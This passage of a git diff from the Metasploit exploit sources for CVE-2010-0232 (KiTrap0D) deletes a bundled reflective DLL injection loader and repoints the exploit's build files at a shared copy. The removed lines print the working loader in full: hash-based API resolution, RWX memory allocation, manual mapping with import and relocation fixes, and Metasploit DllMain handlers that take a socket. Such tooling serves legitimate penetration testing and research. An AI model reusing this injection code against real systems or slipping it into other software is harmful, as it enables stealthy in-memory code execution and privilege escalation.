// uiNameArray = the address of the modules export directory entry - uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of name pointers - uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames ); - - // get the VA for the array of name ordinals - uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals ); - - usCounter = 3; -#ifdef ENABLE_STOPPAGING - usCounter++; -#endif -#ifdef ENABLE_OUTPUTDEBUGSTRING - usCounter++; -#endif - - // loop while we still have imports to find - while( usCounter > 0 ) - { - // compute the hash values for this function name - dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) ); - - // if we have found a function we want we get its virtual address - if( dwHashValue == LOADLIBRARYA_HASH - || dwHashValue == GETPROCADDRESS_HASH - || dwHashValue == VIRTUALALLOC_HASH -#ifdef ENABLE_STOPPAGING - || dwHashValue == VIRTUALLOCK_HASH -#endif -#ifdef ENABLE_OUTPUTDEBUGSTRING - || dwHashValue == OUTPUTDEBUG_HASH -#endif - ) - { - // get the VA for the array of addresses - uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use this functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // store this functions VA - if( dwHashValue == LOADLIBRARYA_HASH ) - pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - else if( dwHashValue == GETPROCADDRESS_HASH ) - pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - else if( dwHashValue == VIRTUALALLOC_HASH ) - pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) ); -#ifdef ENABLE_STOPPAGING - else if( dwHashValue == VIRTUALLOCK_HASH ) - pVirtualLock = (VIRTUALLOCK)( uiBaseAddress + DEREF_32( uiAddressArray ) ); -#endif -#ifdef ENABLE_OUTPUTDEBUGSTRING - else if( dwHashValue == OUTPUTDEBUG_HASH ) - pOutputDebug = (OUTPUTDEBUG)( uiBaseAddress + DEREF_32( uiAddressArray ) ); -#endif - - // decrement our counter - usCounter--; - } - - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - } - else if( (DWORD)uiValueC == NTDLLDLL_HASH ) - { - // get this modules base address - uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; - - // get the VA of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of name pointers - uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames ); - - // get the VA for the array of name ordinals - uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals ); - - usCounter = 1; - - // loop while we still have imports to find - while( usCounter > 0 ) - { - // compute the hash values for this function name - dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) ); - - // if we have found a function we want we get its virtual address - if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH ) - { - // get the VA for the array of addresses - uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use this functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // store this functions VA - if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH ) - pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - - // decrement our counter - usCounter--; - } - - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - } - - // we stop searching when we have found everything we need. - if( pLoadLibraryA - && pGetProcAddress - && pVirtualAlloc -#ifdef ENABLE_STOPPAGING - && pVirtualLock -#endif - && pNtFlushInstructionCache -#ifdef ENABLE_OUTPUTDEBUGSTRING - && pOutputDebug -#endif - ) - break; - - // get the next entry - uiValueA = DEREF( uiValueA ); - } - - // STEP 2: load our image into a new permanent location in memory... - - // get the VA of the NT Header for the PE to be loaded - uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - - // allocate all the memory for the DLL to be loaded into. we can load at any address because we will - // relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems. - uiBaseAddress = (ULONG_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); - -#ifdef ENABLE_STOPPAGING - // prevent our image from being swapped to the pagefile - pVirtualLock((LPVOID)uiBaseAddress, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage); -#endif - - // we must now copy over the headers - uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders; - uiValueB = uiLibraryAddress; - uiValueC = uiBaseAddress; - - while( uiValueA-- ) - *(BYTE *)uiValueC++ = *(BYTE *)uiValueB++; - - // STEP 3: load in all of our sections... - - // uiValueA = the VA of the first section - uiValueA = ( (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader ); - - // itterate through all sections, loading them into memory. - uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections; - while( uiValueE-- ) - { - // uiValueB is the VA for this section - uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress ); - - // uiValueC if the VA for this sections data - uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData ); - - // copy the section over - uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData; - - while( uiValueD-- ) - *(BYTE *)uiValueB++ = *(BYTE *)uiValueC++; - - // get the VA of the next section - uiValueA += sizeof( IMAGE_SECTION_HEADER ); - } - - // STEP 4: process our images import table... - - // uiValueB = the address of the import directory - uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ]; - - // we assume there is an import table to process - // uiValueC is the first entry in the import table - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // iterate through all imports until a null RVA is found (Characteristics is mis-named) - while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Characteristics ) - { - OUTPUTDBG("Loading library: "); - OUTPUTDBG((LPCSTR)(uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name)); - OUTPUTDBG("\n"); - - // use LoadLibraryA to load the imported module into memory - uiLibraryAddress = (ULONG_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) ); - - if ( !uiLibraryAddress ) - { - OUTPUTDBG("Loading library FAILED\n"); - - uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR ); - continue; - } - - // uiValueD = VA of the OriginalFirstThunk - uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk ); - - // uiValueA = VA of the IAT (via first thunk not origionalfirstthunk) - uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk ); - - // itterate through all imported functions, importing by ordinal if no name present - while( DEREF(uiValueA) ) - { - // sanity check uiValueD as some compilers only import by FirstThunk - if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG ) - { - // get the VA of the modules NT Header - uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of addresses - uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use the import ordinal (- export ordinal base) as an index into the array of addresses - uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) ); - - // patch in the address for this imported function - DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) ); - } - else - { - // get the VA of this functions import by name struct - uiValueB = ( uiBaseAddress + DEREF(uiValueA) ); - - OUTPUTDBG("Resolving function: "); - OUTPUTDBG(((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name); - OUTPUTDBG("\n"); - - // use GetProcAddress and patch in the address for this imported function - DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name ); - } - // get the next imported function - uiValueA += sizeof( ULONG_PTR ); - if( uiValueD ) - uiValueD += sizeof( ULONG_PTR ); - } - - // get the next import - uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR ); - } - - // STEP 5: process all of our images relocations... - - // calculate the base address delta and perform relocations (even if we load at desired image base) - uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase; - - // uiValueB = the address of the relocation directory - uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ]; - - // check if their are any relocations present - if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size ) - { - // uiValueC is now the first entry (IMAGE_BASE_RELOCATION) - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // and we itterate through all entries... - while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock ) - { - // uiValueA = the VA for this relocation block - uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress ); - - // uiValueB = number of entries in this relocation block - uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC ); - - // uiValueD is now the first entry in the current relocation block - uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION); - - // we itterate through all the entries in the current block... - while( uiValueB-- ) - { - // perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required. - // we dont use a switch statement to avoid the compiler building a jump table - // which would not be very position independent! - if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 ) - *(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress; - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW ) - *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress; -#ifdef WIN_ARM - // Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem. - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T ) - { - register DWORD dwInstruction; - register DWORD dwAddress; - register WORD wImm; - // get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word) - dwInstruction = *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ); - // flip the words to get the instruction as expected - dwInstruction = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) ); - // sanity chack we are processing a MOV instruction... - if( (dwInstruction & ARM_MOV_MASK) == ARM_MOVT ) - { - // pull out the encoded 16bit value (the high portion of the address-to-relocate) - wImm = (WORD)( dwInstruction & 0x000000FF); - wImm |= (WORD)((dwInstruction & 0x00007000) >> 4); - wImm |= (WORD)((dwInstruction & 0x04000000) >> 15); - wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4); - // apply the relocation to the target address - dwAddress = ( (WORD)HIWORD(uiLibraryAddress) + wImm ) & 0xFFFF; - // now create a new instruction with the same opcode and register param. - dwInstruction = (DWORD)( dwInstruction & ARM_MOV_MASK2 ); - // patch in the relocated address... - dwInstruction |= (DWORD)(dwAddress & 0x00FF); - dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4; - dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15; - dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4; - // now flip the instructions words and patch back into the code... - *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ) = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) ); - } - } -#endif - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH ) - *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress); - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW ) - *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress); - - // get the next entry in the current relocation block - uiValueD += sizeof( IMAGE_RELOC ); - } - - // get the next entry in the relocation directory - uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock; - } - } - - // STEP 6: call our images entry point - - // uiValueA = the VA of our newly loaded DLL/EXE's entry point - uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint ); - - OUTPUTDBG("Flushing the instruction cache"); - // We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing. - pNtFlushInstructionCache( (HANDLE)-1, NULL, 0 ); - - // call our respective entry point, fudging our hInstance value -#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR - // if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter) - ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter ); -#else - // if we are injecting an DLL via a stub we call DllMain with no parameter - ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL ); -#endif - - // STEP 8: return our new entry point address so whatever called us can call DllMain() if needed. - return uiValueA; -} -//===============================================================================================// -#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN - -// you must implement this function... -extern DWORD DLLEXPORT Init( SOCKET socket ); - -BOOL MetasploitDllAttach( SOCKET socket ) -{ - Init( socket ); - return TRUE; -} - -BOOL MetasploitDllDetach( DWORD dwExitFunc ) -{ - switch( dwExitFunc ) - { - case EXITFUNC_SEH: - SetUnhandledExceptionFilter( NULL ); - break; - case EXITFUNC_THREAD: - ExitThread( 0 ); - break; - case EXITFUNC_PROCESS: - ExitProcess( 0 ); - break; - default: - break; - } - - return TRUE; -} - -BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) -{ - BOOL bReturnValue = TRUE; - - switch( dwReason ) - { - case DLL_METASPLOIT_ATTACH: - bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved ); - break; - case DLL_METASPLOIT_DETACH: - bReturnValue = MetasploitDllDetach( (DWORD)lpReserved ); - break; - case DLL_QUERY_HMODULE: - if( lpReserved != NULL ) - *(HMODULE *)lpReserved = hAppInstance; - break; - case DLL_PROCESS_ATTACH: - hAppInstance = hinstDLL; - break; - case DLL_PROCESS_DETACH: - case DLL_THREAD_ATTACH: - case DLL_THREAD_DETACH: - break; - } - return bReturnValue; -} - -#endif -//===============================================================================================// diff --git a/external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.h b/external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.h deleted file mode 100644 index 26c195b2fc..0000000000 --- a/external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.h +++ /dev/null @@ -1,223 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H -#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H -//===============================================================================================// -#define WIN32_LEAN_AND_MEAN -#include -#include -#include - -#include "ReflectiveDLLInjection.h" - -// Enable this define to turn on OutputDebugString support -//#define ENABLE_OUTPUTDEBUGSTRING 1 - -// Enable this define to turn on locking of memory to prevent paging -#define ENABLE_STOPPAGING 1 - -#define EXITFUNC_SEH 0xEA320EFE -#define EXITFUNC_THREAD 0x0A2A1DE0 -#define EXITFUNC_PROCESS 0x56A2B5F0 - -typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR ); -typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR ); -typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD ); -typedef DWORD (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG ); - -#define KERNEL32DLL_HASH 0x6A4ABC5B -#define NTDLLDLL_HASH 0x3CFA685D - -#define LOADLIBRARYA_HASH 0xEC0E4E8E -#define GETPROCADDRESS_HASH 0x7C0DFCAA -#define VIRTUALALLOC_HASH 0x91AFCA54 -#define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8 - -#ifdef ENABLE_STOPPAGING -typedef LPVOID (WINAPI * VIRTUALLOCK)( LPVOID, SIZE_T ); -#define VIRTUALLOCK_HASH 0x0EF632F2 -#endif - -#ifdef ENABLE_OUTPUTDEBUGSTRING -typedef LPVOID (WINAPI * OUTPUTDEBUG)( LPCSTR ); -#define OUTPUTDEBUG_HASH 0x470D22BC -#endif - -#define IMAGE_REL_BASED_ARM_MOV32A 5 -#define IMAGE_REL_BASED_ARM_MOV32T 7 - -#define ARM_MOV_MASK (DWORD)(0xFBF08000) -#define ARM_MOV_MASK2 (DWORD)(0xFBF08F00) -#define ARM_MOVW 0xF2400000 -#define ARM_MOVT 0xF2C00000 - -#define HASH_KEY 13 -//===============================================================================================// -#pragma intrinsic( _rotr ) - -__forceinline DWORD ror( DWORD d ) -{ - return _rotr( d, HASH_KEY ); -} - -__forceinline DWORD _hash( char * c ) -{ - register DWORD h = 0; - do - { - h = ror( h ); - h += *c; - } while( *++c ); - - return h; -} -//===============================================================================================// -typedef struct _UNICODE_STR -{ - USHORT Length; - USHORT MaximumLength; - PWSTR pBuffer; -} UNICODE_STR, *PUNICODE_STR; - -// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY -//__declspec( align(8) ) -typedef struct _LDR_DATA_TABLE_ENTRY -{ - //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry. - LIST_ENTRY InMemoryOrderModuleList; - LIST_ENTRY InInitializationOrderModuleList; - PVOID DllBase; - PVOID EntryPoint; - ULONG SizeOfImage; - UNICODE_STR FullDllName; - UNICODE_STR BaseDllName; - ULONG Flags; - SHORT LoadCount; - SHORT TlsIndex; - LIST_ENTRY HashTableEntry; - ULONG TimeDateStamp; -} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; - -// WinDbg> dt -v ntdll!_PEB_LDR_DATA -typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes -{ - DWORD dwLength; - DWORD dwInitialized; - LPVOID lpSsHandle; - LIST_ENTRY InLoadOrderModuleList; - LIST_ENTRY InMemoryOrderModuleList; - LIST_ENTRY InInitializationOrderModuleList; - LPVOID lpEntryInProgress; -} PEB_LDR_DATA, * PPEB_LDR_DATA; - -// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK -typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes -{ - struct _PEB_FREE_BLOCK * pNext; - DWORD dwSize; -} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; - -// struct _PEB is defined in Winternl.h but it is incomplete -// WinDbg> dt -v ntdll!_PEB -typedef struct __PEB // 65 elements, 0x210 bytes -{ - BYTE bInheritedAddressSpace; - BYTE bReadImageFileExecOptions; - BYTE bBeingDebugged; - BYTE bSpareBool; - LPVOID lpMutant; - LPVOID lpImageBaseAddress; - PPEB_LDR_DATA pLdr; - LPVOID lpProcessParameters; - LPVOID lpSubSystemData; - LPVOID lpProcessHeap; - PRTL_CRITICAL_SECTION pFastPebLock; - LPVOID lpFastPebLockRoutine; - LPVOID lpFastPebUnlockRoutine; - DWORD dwEnvironmentUpdateCount; - LPVOID lpKernelCallbackTable; - DWORD dwSystemReserved; - DWORD dwAtlThunkSListPtr32; - PPEB_FREE_BLOCK pFreeList; - DWORD dwTlsExpansionCounter; - LPVOID lpTlsBitmap; - DWORD dwTlsBitmapBits[2]; - LPVOID lpReadOnlySharedMemoryBase; - LPVOID lpReadOnlySharedMemoryHeap; - LPVOID lpReadOnlyStaticServerData; - LPVOID lpAnsiCodePageData; - LPVOID lpOemCodePageData; - LPVOID lpUnicodeCaseTableData; - DWORD dwNumberOfProcessors; - DWORD dwNtGlobalFlag; - LARGE_INTEGER liCriticalSectionTimeout; - DWORD dwHeapSegmentReserve; - DWORD dwHeapSegmentCommit; - DWORD dwHeapDeCommitTotalFreeThreshold; - DWORD dwHeapDeCommitFreeBlockThreshold; - DWORD dwNumberOfHeaps; - DWORD dwMaximumNumberOfHeaps; - LPVOID lpProcessHeaps; - LPVOID lpGdiSharedHandleTable; - LPVOID lpProcessStarterHelper; - DWORD dwGdiDCAttributeList; - LPVOID lpLoaderLock; - DWORD dwOSMajorVersion; - DWORD dwOSMinorVersion; - WORD wOSBuildNumber; - WORD wOSCSDVersion; - DWORD dwOSPlatformId; - DWORD dwImageSubsystem; - DWORD dwImageSubsystemMajorVersion; - DWORD dwImageSubsystemMinorVersion; - DWORD dwImageProcessAffinityMask; - DWORD dwGdiHandleBuffer[34]; - LPVOID lpPostProcessInitRoutine; - LPVOID lpTlsExpansionBitmap; - DWORD dwTlsExpansionBitmapBits[32]; - DWORD dwSessionId; - ULARGE_INTEGER liAppCompatFlags; - ULARGE_INTEGER liAppCompatFlagsUser; - LPVOID lppShimData; - LPVOID lpAppCompatInfo; - UNICODE_STR usCSDVersion; - LPVOID lpActivationContextData; - LPVOID lpProcessAssemblyStorageMap; - LPVOID lpSystemDefaultActivationContextData; - LPVOID lpSystemAssemblyStorageMap; - DWORD dwMinimumStackCommit; -} _PEB, * _PPEB; - -typedef struct -{ - WORD offset:12; - WORD type:4; -} IMAGE_RELOC, *PIMAGE_RELOC; -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.c b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.c index 0e1600ee74..de50313c19 100755 --- a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.c +++ b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.c @@ -10,11 +10,11 @@ */ #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN -#include "../common/ReflectiveLoader.c" +#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include #include "../common/common.h" -#include "../common/LoadLibraryR.h" +#include "../../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h" #include "../common/ResourceLoader.h" #include "resource.h" diff --git a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj index 8b82cd553c..8bc56a0824 100644 --- a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj +++ b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj @@ -49,7 +49,7 @@ Disabled - %(AdditionalIncludeDirectories) + ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) WIN32;_DEBUG;_WINDOWS;_USRDLL;KITRAP0D_EXPORTS;%(PreprocessorDefinitions) true EnableFastChecks @@ -81,7 +81,7 @@ MinSpace OnlyExplicitInline false - %(AdditionalIncludeDirectories) + ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) WIN32;NDEBUG;_WINDOWS;_USRDLL;KITRAP0D_EXPORTS;%(PreprocessorDefinitions) true MultiThreaded @@ -121,17 +121,21 @@ /ignore:4070 - editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +IF EXIST "..\..\..\..\..\data\exploits\CVE-2010-0232\" GOTO COPY + mkdir "..\..\..\..\..\data\exploits\CVE-2010-0232\" +:COPY +copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2010-0232\" - + + - diff --git a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj.filters b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj.filters index 3c522c527e..9aea3a8408 100644 --- a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj.filters +++ b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj.filters @@ -2,24 +2,24 @@ - - common - common + + RDI + common - - common - common + + RDI + @@ -28,5 +28,8 @@ {cbb362dd-4029-4348-86d3-62c4b22c742d} + + {662e77af-b8cd-4717-a3f2-87b2ec57f46c} + \ No newline at end of file diff --git a/external/source/exploits/CVE-2010-0232/kitrap0d_payload/kitrap0d_payload.vcxproj b/external/source/exploits/CVE-2010-0232/kitrap0d_payload/kitrap0d_payload.vcxproj index 32875e0cb3..41cb73ff96 100644 --- a/external/source/exploits/CVE-2010-0232/kitrap0d_payload/kitrap0d_payload.vcxproj +++ b/external/source/exploits/CVE-2010-0232/kitrap0d_payload/kitrap0d_payload.vcxproj @@ -49,7 +49,7 @@ Disabled - %(AdditionalIncludeDirectories) + ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) WIN32;_DEBUG;_WINDOWS;_USRDLL;KITRAP0D_PAYLOAD_EXPORTS;%(PreprocessorDefinitions) true EnableFastChecks @@ -75,7 +75,7 @@ MinSpace OnlyExplicitInline false - %(AdditionalIncludeDirectories) + ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) WIN32;NDEBUG;_WINDOWS;_USRDLL;KITRAP0D_PAYLOAD_EXPORTS;%(PreprocessorDefinitions) true MultiThreaded diff --git a/external/source/exploits/CVE-2010-0232/kitrap0d_payload/main.c b/external/source/exploits/CVE-2010-0232/kitrap0d_payload/main.c index 